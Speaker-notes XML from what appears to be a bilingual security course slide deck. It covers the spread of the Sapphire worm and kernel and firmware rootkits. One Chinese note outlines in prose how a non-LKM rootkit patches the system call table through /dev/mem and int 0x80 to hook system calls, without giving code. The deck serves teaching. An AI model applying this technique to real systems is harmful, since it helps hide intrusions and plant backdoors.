              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>This graphic is more for effect rather than technical detail: We couldn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>t determine a detailed location for all infections, and the diameter of each circle is proportional to the lg() of the number of infections, underrepresenting larger infections.   Nevertheless, it gives a good feel for where Sapphire spread.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>We monitored the spread using several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Network Telescopes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>, address ranges where we had sampled or complete packet traces at single sources.  We also used the D-shield distributed intrusion detection system to determine IPs of infected machines, but we couldn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>t use this data for calculating the scanning rate.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C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24860041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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A75F25D-5B9E-49CE-9176-AB5FD7A190D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B74E00B-3EFE-429B-9C74-1855EC6FB9C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8" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC85A3B-7011-4FB1-B1AA-80DC7F57E8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652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3FB41B1-0C5E-47E6-A1E3-7884A285D136}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1641623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t>bootRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2191940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C0F0814-F375-4B63-8F5A-B9087699A934}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18430860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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1694CC84-22EE-4084-B732-D1B804678202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F42342-C73F-4375-9E07-431848CB08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2" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D42BFCE6-976A-4CD5-BD2E-3684435551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DC9332C-D1A3-44B4-8116-95213430AD40}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B5AFBA-08FE-4787-ACB7-576C38022501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128003" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62680920-678F-4624-B8F4-DE58F1C00D6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solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>内核级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>又可分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主要基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>技术，通过系统提供的接口加载到内核空间，成为内核的一部分，进而通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>系统调用等技术实现隐藏、后门功能。非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主要是指在系统不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>机制时修改内核的一种方法，主要通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/dev/mem</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/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kmem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>设备直接操作内存，从而对内核进行修改。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lkm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>要实现对内核的修改，首先需要获得内核空间的内存，因此需要调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>分配内存，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>是内核空间的调用，无法在用户空间直接调用该函数，因此想到了通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>调用该函数的方法。先选择一个不常见的系统调用号，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>中找到该项，通过写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/dev/mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>直接将其修改为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>函数的地址，这样当我们在用户空间调用该系统调用时，就能通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进入内核空间，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>函数分配内存，并将分配好的内存地址由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>寄存器返回，从而我们得到了一块属于内核地址空间的内存，接着将要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的函数写入该内存，并再次修改系统调用表，就能实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>系统调用的功能。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="606266"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>硬件级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="606266"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Rootkit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="606266"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>可以植入到计算机的固件中，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="606266"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="606266"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>、网卡、硬盘控制器等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128004" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80C4355-61C2-441E-B02C-926BB62156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91585804-6AC7-48AF-91F4-E017E1929B58}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B58D3D-A5EB-421D-AD84-DF8F6693A033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F20CBE9-CD70-4C32-B86F-007EFEC6B4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6196" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FB05BF-0AF3-4374-8F7D-3507D7B16BB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4ECE943-D95D-46A3-A9D5-9AFCC826CCF4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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D6BF4844-19E0-4DB4-BF2C-F127E19BD8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652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652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4A70356-76EB-46D5-A817-45516AD17ABC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151555" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D861C434-B481-4EB5-B4A8-15B44BB4BB28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
